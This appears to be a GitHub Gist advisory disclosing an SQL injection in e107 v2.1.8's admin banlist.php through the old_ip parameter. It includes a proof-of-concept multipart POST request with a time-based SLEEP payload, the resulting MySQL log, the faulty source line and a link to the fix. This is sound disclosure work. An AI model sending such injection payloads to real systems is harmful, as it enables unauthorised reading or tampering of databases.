Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
e107 v2.1.8 Banlist SQL Injection

Description

e107 v2.1.8 contains a flaw that may allow carrying out an SQL injection attack. The issue is due to the /e107_admin/banlist.php script not properly escaping input to the old_ip parameter. This may allow a remote attacker to inject or manipulate SQL queries in the database, allowing for the manipulation or disclosure of arbitrary data.

Reproduce

  1. Login to the admin page. (/e107_admin/admin.php)
  2. Send a POST request to /e107_admin/banlist.php and use BurpSuite to rewrite parameters as follows.
POST /e107/e107_admin/banlist.php HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryREEvpmFYBJa0wazD
Cookie: my_cookie=***********************
Content-Length: 464

------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="entry_intent"

dummy
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="update_ban"

dummy
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="ban_ip"

dummy
------WebKitFormBoundaryREEvpmFYBJa0wazD
Content-Disposition: form-data; name="old_ip"

'; SELECT SLEEP(10) --'
------WebKitFormBoundaryREEvpmFYBJa0wazD--
  1. It takes 10 seconds or more for the response to come back.

This means that an SQL query SELECT SLEEP(10) set to old_ip was executed on the server.
This is mysql's query log.

2018-07-31T01:44:07.412204Z	   27 Query	UPDATE e107_banlist SET `banlist_ip`='dummy', `banlist_admin`='1', `banlist_reason`='', `banlist_notes`='' WHERE banlist_ip='';
2018-07-31T01:44:07.412445Z	   27 Query	SELECT SLEEP(10) --''

Source Code

https://github.com/e107inc/e107/blob/6ee75cd4569182faed63750de169fed407ba4a7a/e107_admin/banlist.php#L793

The cause of the vulnerability is in this line. $_POST['old_ip'] is concatenated without properly escaping.

Reference

https://github.com/e107inc/e107/issues/3352

Solution

https://github.com/e107inc/e107/commit/ec483e9379aa622bfcc1b853b189c74288771f27

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.